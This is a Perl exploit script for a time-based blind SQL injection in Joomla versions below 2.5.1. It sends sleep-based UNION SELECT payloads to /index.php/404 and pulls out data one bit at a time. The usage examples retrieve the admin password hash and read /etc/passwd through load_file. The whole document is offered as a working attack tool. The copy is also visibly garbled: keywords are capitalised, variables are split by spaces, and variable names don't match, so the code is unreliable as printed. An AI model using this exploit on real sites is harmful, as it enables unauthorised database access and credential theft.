#! /Usr/bin/perl
# Thu Mar 15 22:55:32 CET 2012 A. Ramos <aramosf () unsec.net>
# Www.securitybydefault.com
# Joomla <2.5.1 time based SQL injection-vuln by Colin Wong
#
# Using sleep () and not benchmark (), change for <mysql 5.0.12
#
#1.-Database name: database ()
#2.-Users data table name: (change 'joomla 'for database () result)
# Select table_name from information_schema.tables where table_schema = "joomla" and table_name like "% _ users"
#3.-Admin password: (change zzz_users from previus SQL query result)
# Select password from zzzz_users limit 1
Use strict;
Use LWP: UserAgent;
$ | = 1;
My $ url = $ ARGV [0];
My $ wtime = $ ARGV [1];
My $ SQL = $ ARGV [2];
Unless ($ ARGV [2]) {
Print "$0 <url> <wait time> <SQL> \ n ";
Print "\ texamples: \ n ";
Print "\ t get admin password: \ n ";
Print "\ t $0 http: // host/joomla/3 'database () '\ n ";
Print "\ t $0 http: // host/joomla/3 'select table_name from information_schema.tables where table_schema = \ "joomla \" and table_name like \ "% 25_users \" \ '\ n ";
Print "\ t $0 http: // www.2cto.com/joomla/3 'select password from zzzz_users limit 1' \ n ";
Print "\ t get file/etc/passwd \ n ";
Print "\ t $0 http: // host/joomla/3 'Load _ file (\"/etc/passwd \ ") '\ n ";
Exit 1;
}
My ($ len, $ sqldata );
My $ ua = LWP: UserAgent-> new;
$ Ua-> timeout (60 );
$ Ua-> env_proxy;
My $ stime = time ();
My $ res = $ ua-> get ($ url );
My $ etime = time ();
My $ regrtt = $ etime-$ stime;
Print "rtt: $ regrtt secs \ n ";
Print "vuln? :";
My $ sleep = $ regrtt + $ wtime;
$ Stime = time ();
$ Res = $ ua-> get ($ url. "/index. php/404 'union select sleep ($ sleep) union select '1 ");
$ Etime = time ();
My $ rtt = $ etime-$ stime;
If ($ rtt> = $ regrtt + $ wtime) {print "OK! \ N ";}else {print" nope :( \ n "; exit 1 ;}
My $ lenoflen;
Sub len {
# Length of length
For (1 .. 5 ){
My $ SQL =$ _ [0];
$ Stime = time ();
$ Res = $ ua-> get ($ url. "/index. php/404 'Union select if (length ($ SQL) =$ _, sleep ($ wtime), null) union select '1 ");
$ Etime = time ();
My $ rtt = $ etime-$ stime;
If ($ rtt> = $ regrtt + $ wtime ){
$ Lenoflen = $ _;
Last;
}
}
For (1 .. $ lenoflen ){
My $ ll;
$ Ll = $ _;
For (0 .. 9 ){
My $ SQL =$ _ [0];
$ Stime = time ();
$ Res = $ ua-> get ($ url. "/index. php/404 'Union select if (mid (length ($ SQL), $ ll, 1) =_ _, sleep ($ wtime), null) union select '1 ");
$ Etime = time ();
My $ rtt = $ etime-$ stime;
If ($ rtt> = $ regrtt + $ wtime ){
$ Len. = $ _;
}
}
}
Return $ len;
}
Sub data {
My $ SQL =$ _ [0];
My $ len = $ _ [1];
My ($ bit, $ str, @ byte );
My $ Height = 128;
For (1 .. $ len ){
My $ c = 8;
@ Byte = "";
My $ a =$ _;
For ($ bit = 1; $ bit <= $ high; $ bit * = 2 ){
$ Stime = time ();
# Select if (ord (mid (load_file ("/etc/passwd"),) & 64) = 0, sleep (2), null) union select '1 ';
$ Res = $ ua-> get ($ url. "/index. php/404 'Union select if (ord (mid ($ SQL), $ a, 1) & $ bit) = 0, sleep ($ wtime), null) union select '1 ");
$ Etime = time ();
My $ rtt = $ etime-$ stime;
If ($ rtt> = $ regrtt + $ wtime ){
$ Byte [$ c] = "0 ";
} Else {$ byte [$ c] = "1 ";}
$ C --;
}
$ Str = join ("", @ byte );
Print pack ("B *", "$ str ");
}
}
$ Len = len ($ SQL );
Print "$ SQL length: $ len \ n ";
Print "$ SQL data: \ n ";
Data ($ SQL, $ len );